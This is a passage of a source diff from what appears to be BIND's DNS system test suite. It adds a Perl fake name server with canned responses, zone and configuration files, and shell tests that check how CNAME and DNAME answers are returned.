file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# This is the name server from hell. It provides canned +# responses based on pattern matching the queries, and +# can be reprogrammed on-the-fly over a TCP connection. +# +# The server listens for queries on port 5300 (or PORT). +# +# The server listens for control connections on port 5301 (or EXTRAPORT1). +# +# A control connection is a TCP stream of lines like +# +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# +# There can be any number of patterns, each associated +# with any number of response RRs. Each pattern is a +# Perl regular expression. If an empty pattern ("//") is +# received, the server will ignore all incoming queries (TCP +# connections will still be accepted, but both UDP queries +# and TCP queries will not be responded to). If a non-empty +# pattern is then received over the same control connection, +# default behavior is restored. +# +# Each incoming query is converted into a string of the form +# "qname qtype" (the printable query domain name, space, +# printable query type) and matched against each pattern. +# +# The first pattern matching the query is selected, and +# the RR following the pattern line are sent in the +# answer section of the response. +# +# Each new control connection causes the current set of +# patterns and responses to be cleared before adding new +# ones. +# +# The server handles UDP and TCP queries. Zone transfer +# responses work, but must fit in a single 64 k message. +# +# Now you can add TSIG, just specify key/key data with: +# +# /pattern <key> <key_data>/ +# name ttl type rdata +# name ttl type rdata +# +# Note that this data will still be sent with any request for +# pattern, only this data will be signed. Currently, this is only +# done for TCP. +# +# /pattern bad-id <key> <key_data>/ +# /pattern bad-id/ +# +# will add 50 to the message id of the response. + + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +# We default to listening on 10.53.0.2 for historical reasons +# XXX: we should also be able to specify IPv6 +my $server_addr = "10.53.0.2"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $mainport = int($ENV{'PORT'}); +if (!$mainport) { $mainport = 5300; } +my $ctrlport = int($ENV{'EXTRAPORT1'}); +if (!$ctrlport) { $ctrlport = 5301; } + +# XXX: we should also be able to set the port numbers to listen on. +my $ctlsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $ctrlport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "udp", Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +print "listening on $server_addr:$mainport,$ctrlport.\n"; +print "Using Net::DNS $Net::DNS::VERSION\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +#my @answers = (); +my @rules; +my $udphandler; +my $tcphandler; + +sub handleUDP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + while (my $rr = $request->pop("additional")) { + $prev_tsig = $rr if ($rr->type eq "TSIG"); + } + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data) = split(/ /,$pattern); + print "[handleUDP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && defined($key_data)) { + my $tsig; + # Sign the packet + print " Signing the response with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } else { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $packet->sign_tsig($tsig); + } + last; + } + } + #$packet->print; + + return $packet->data; +} + +# namelen: +# given a stream of data, reads a DNS-formatted name and returns its +# total length, thus making it possible to skip past it. +sub namelen { + my ($data) = @_; + my $len = 0; + my $label_len = 0; + do { + $label_len = unpack("c", $data); + $data = substr($data, $label_len + 1); + $len += $label_len + 1; + } while ($label_len != 0); + return ($len); +} + +# packetlen: +# given a stream of data, reads a DNS wire-format packet and returns +# its total length, making it possible to skip past it. +sub packetlen { + my ($data) = @_; + my $q; + my $rr; + my $header; + my $offset; + + # + # decode/encode were introduced in Net::DNS 0.68 + # parse is no longer a method and calling it here makes perl croak. + # + my $decode = 0; + $decode = 1 if ($Net::DNS::VERSION >= 0.68); + + if ($decode) { + ($header, $offset) = Net::DNS::Header->decode(\$data); + } else { + ($header, $offset) = Net::DNS::Header->parse(\$data); + } + + for (1 .. $header->qdcount) { + if ($decode) { + ($q, $offset) = + Net::DNS::Question->decode(\$data, $offset); + } else { + ($q, $offset) = + Net::DNS::Question->parse(\$data, $offset); + } + } + for (1 .. $header->ancount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->nscount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->arcount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + return $offset; +} + +# sign_tcp_continuation: +# This is a hack to correct the problem that Net::DNS has no idea how +# to sign multiple-message TCP responses. Several data that are included +# in the digest when signing a query or the first message of a response are +# omitted when signing subsequent messages in a TCP stream. +# +# Net::DNS::Packet->sign_tsig() has the ability to use a custom signing +# function (specified by calling Packet->sign_func()). We use this +# function as the signing function for TCP continuations, and it removes +# the unwanted data from the digest before calling the default sign_hmac +# function. +sub sign_tcp_continuation { + my ($key, $data) = @_; + + # copy out first two bytes: size of the previous MAC + my $rmacsize = unpack("n", $data); + $data = substr($data, 2); + + # copy out previous MAC + my $rmac = substr($data, 0, $rmacsize); + $data = substr($data, $rmacsize); + + # try parsing out the packet information + my $plen = packetlen($data); + my $pdata = substr($data, 0, $plen); + $data = substr($data, $plen); + + # remove the keyname, ttl, class, and algorithm name + $data = substr($data, namelen($data)); + $data = substr($data, 6); + $data = substr($data, namelen($data)); + + # preserve the TSIG data + my $tdata = substr($data, 0, 8); + + # prepare a new digest and sign with it + $data = pack("n", $rmacsize) . $rmac . $pdata . $tdata; + return Net::DNS::RR::TSIG::sign_hmac($key, $data); +} + +sub handleTCP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $opaque; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + my $signer; + my $continuation = 0; + if ($Net::DNS::VERSION < 0.81) { + while (my $rr = $request->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + } + + my @results = (); + my $count_these = 0; + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data, $extra) = split(/ /,$pattern); + print "[handleTCP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + $count_these++; + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && $key_name eq "bad-id") { + $packet->header->id(($id+50)%0xffff); + $key_name = $key_data; + $key_data = $extra; + } + if (defined($key_name) && defined($key_data)) { + my $tsig; + # sign the packet + print " Signing the data with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } elsif ($Net::DNS::VERSION >= 0.81 && + $continuation) { + } elsif ($Net::DNS::VERSION >= 0.75 && + $continuation) { + $tsig = $prev_tsig; + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } elsif ($Net::DNS::VERSION < 0.81) { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $tsig->sign_func($signer) if defined($signer); + $tsig->continuation($continuation) if + ($Net::DNS::VERSION >= 0.71 && + $Net::DNS::VERSION <= 0.74 ); + if ($Net::DNS::VERSION < 0.81) { + $packet->sign_tsig($tsig); + } elsif ($continuation) { + $opaque = $packet->sign_tsig($opaque); + } else { + $opaque = $packet->sign_tsig($request); + } + $signer = \&sign_tcp_continuation + if ($Net::DNS::VERSION < 0.70); + $continuation = 1; + + my $copy = + Net::DNS::Packet->new(\($packet->data)); + $prev_tsig = $copy->pop("additional"); + } + #$packet->print; + push(@results,$packet->data); + $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + } + } + print " A total of $count_these patterns matched\n"; + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($ctlsock), 1) = 1; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($ctlsock), 1)) { + warn "ctl conn"; + my $conn = $ctlsock->accept; + my $rule = (); + @rules = (); + while (my $line = $conn->getline) { + chomp $line; + if ($line =~ m!^/(.*)/$!) { + if (length($1) == 0) { + $udphandler = sub { return; }; + $tcphandler = sub { return; }; + } else { + $udphandler = \&handleUDP; + $tcphandler = \&handleTCP; + $rule = { pattern => $1, answer => [] }; + push(@rules, $rule); + } + } else { + push(@{$rule->{answer}}, + new Net::DNS::RR($line)); + } + } + $conn->close; + #print Dumper(@rules); + #print "+=+=+ $rules[0]->{'pattern'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]->{'rname'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]\n"; + } elsif (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = &$udphandler($buf); + if (defined($result)) { + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = &$tcphandler($buf); + if (defined($result)) { + foreach my $response (@$result) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } + } + } + $conn->close; + } +} diff --git a/bin/tests/system/auth/clean.sh b/bin/tests/system/auth/clean.sh new file mode 100644 index 0000000..5fb37ac --- /dev/null +++ b/bin/tests/system/auth/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f dig.out.test* +rm -f ns2/example.com.bk +rm -f ns2/example.net.bk +rm -f ns*/managed-keys.bind* ns*/*mkeys* diff --git a/bin/tests/system/auth/ns1/chaos.db b/bin/tests/system/auth/ns1/chaos.db new file mode 100644 index 0000000..bbd489a --- /dev/null +++ b/bin/tests/system/auth/ns1/chaos.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ CH SOA ns root ( + 2018010100 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A ch-addr.example. 1001 +test A ch-addr.example. 1002 + A ch-addr.example. 1003 diff --git a/bin/tests/system/auth/ns1/example.com.db b/bin/tests/system/auth/ns1/example.com.db new file mode 100644 index 0000000..6768895 --- /dev/null +++ b/bin/tests/system/auth/ns1/example.com.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2018010100 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 +www CNAME server.example.net. +inzone CNAME a.example.com. +a A 10.53.0.1 +dname DNAME @ diff --git a/bin/tests/system/auth/ns1/example.net.db b/bin/tests/system/auth/ns1/example.net.db new file mode 100644 index 0000000..29885ca --- /dev/null +++ b/bin/tests/system/auth/ns1/example.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2018010100 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 +server A 10.53.0.100 diff --git a/bin/tests/system/auth/ns1/named.conf.in b/bin/tests/system/auth/ns1/named.conf.in new file mode 100644 index 0000000..db7570e --- /dev/null +++ b/bin/tests/system/auth/ns1/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +view main in { + zone example.net { + type primary; + file "example.net.db"; + }; + + zone example.com { + type primary; + file "example.com.db"; + }; +}; + +view alt chaos { + zone example.chaos chaos { + type primary; + file "chaos.db"; + }; +}; diff --git a/bin/tests/system/auth/ns2/named.conf.in b/bin/tests/system/auth/ns2/named.conf.in new file mode 100644 index 0000000..126d576 --- /dev/null +++ b/bin/tests/system/auth/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify no; +}; + +zone example.net { + type secondary; + primaries { 10.53.0.1; }; + file "example.net.bk"; +}; + +zone example.com { + type secondary; + primaries { 10.53.0.1; }; + file "example.com.bk"; +}; diff --git a/bin/tests/system/auth/setup.sh b/bin/tests/system/auth/setup.sh new file mode 100644 index 0000000..36969b7 --- /dev/null +++ b/bin/tests/system/auth/setup.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/auth/tests.sh b/bin/tests/system/auth/tests.sh new file mode 100644 index 0000000..d7e923e --- /dev/null +++ b/bin/tests/system/auth/tests.sh @@ -0,0 +1,191 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp -p ${PORT}" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "wait for zones to finish transferring to ns2 ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + for zone in example.com example.net + do + $DIG $DIGOPTS @10.53.0.2 soa $zone > dig.out.test$n || ret=1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 + done + [ $ret -eq 0 ] && break + sleep 1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# +# If recursion is unrequested or unavailable, then cross-zone CNAME records +# should not be followed. If both requested and available, they should be. +# +n=`expr $n + 1` +echo_i "check that cross-zone CNAME record does not return target data (rd=0/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.1 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that cross-zone CNAME record does not return target data (rd=1/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +rec @10.53.0.1 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that cross-zone CNAME record does not return target data (rd=0/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.2 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa ra;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that cross-zone CNAME records return target data (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd ra;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# +# In-zone CNAME records should always be followed regardless of RD and RA. +# +n=`expr $n + 1` +echo_i "check that in-zone CNAME records return target data (rd=0/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.1 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records returns target data (rd=1/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +rec @10.53.0.1 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records return target data (rd=0/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.2 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa ra;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records return target data (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd ra;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records does not return target data when QTYPE is CNAME (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t cname inzone.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 1,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com\..*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'a\.example\.com\..*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records does not return target data when QTYPE is ANY (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t any inzone.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 1,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com\..*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'a\.example\.com\..*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone DNAME records does not return target data when QTYPE is CNAME (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t cname inzone.dname.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 2,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'dname\.example\.com\..*DNAME.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.dname\.example\.com\..*CNAME.inzone\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com\..*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null && ret=1 +grep 'a\.example\.com\..*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone DNAME records does not return target data when QTYPE is ANY (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t any inzone.dname.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 2,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'dname\.example\.com\..*DNAME.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.dname\.example\.com\..*CNAME.inzone\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com.*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null && ret=1 +grep 'a\.example\.com.*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that CHAOS addresses are compared correctly ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 +noall +answer ch test.example.chaos > dig.out.test$n +lines=`wc -l < dig.out.test$n` +[ ${lines:-0} -eq 2 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/autosign/clean.sh b/bin/tests/system/autosign/clean.sh new file mode 100644 index 0000000..ef67677 --- /dev/null +++ b/bin/tests/system/autosign/clean.sh @@ -0,0 +1,75 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */K* */dsset-* */*.signed */tmp* */*.jnl */*.bk +rm -f */core +rm -f */example.bk +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run* +rm -f */trusted.conf */private.conf +rm -f activate-now-publish-1day.key +rm -f active.key inact.key del.key delzsk.key unpub.key standby.key rev.key +rm -f delayksk.key delayzsk.key autoksk.key autozsk.key +rm -f dig.out.* +rm -f digcomp.out.test* +rm -f noksk-ksk.key nozsk-ksk.key nozsk-zsk.key inaczsk-zsk.key inaczsk-ksk.key +rm -f nopriv.key vanishing.key del1.key del2.key +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock +rm -f ns1/root.db +rm -f ns2/example.db +rm -f ns2/optout-with-ent.db +rm -f ns2/private.secure.example.db ns2/bar.db +rm -f 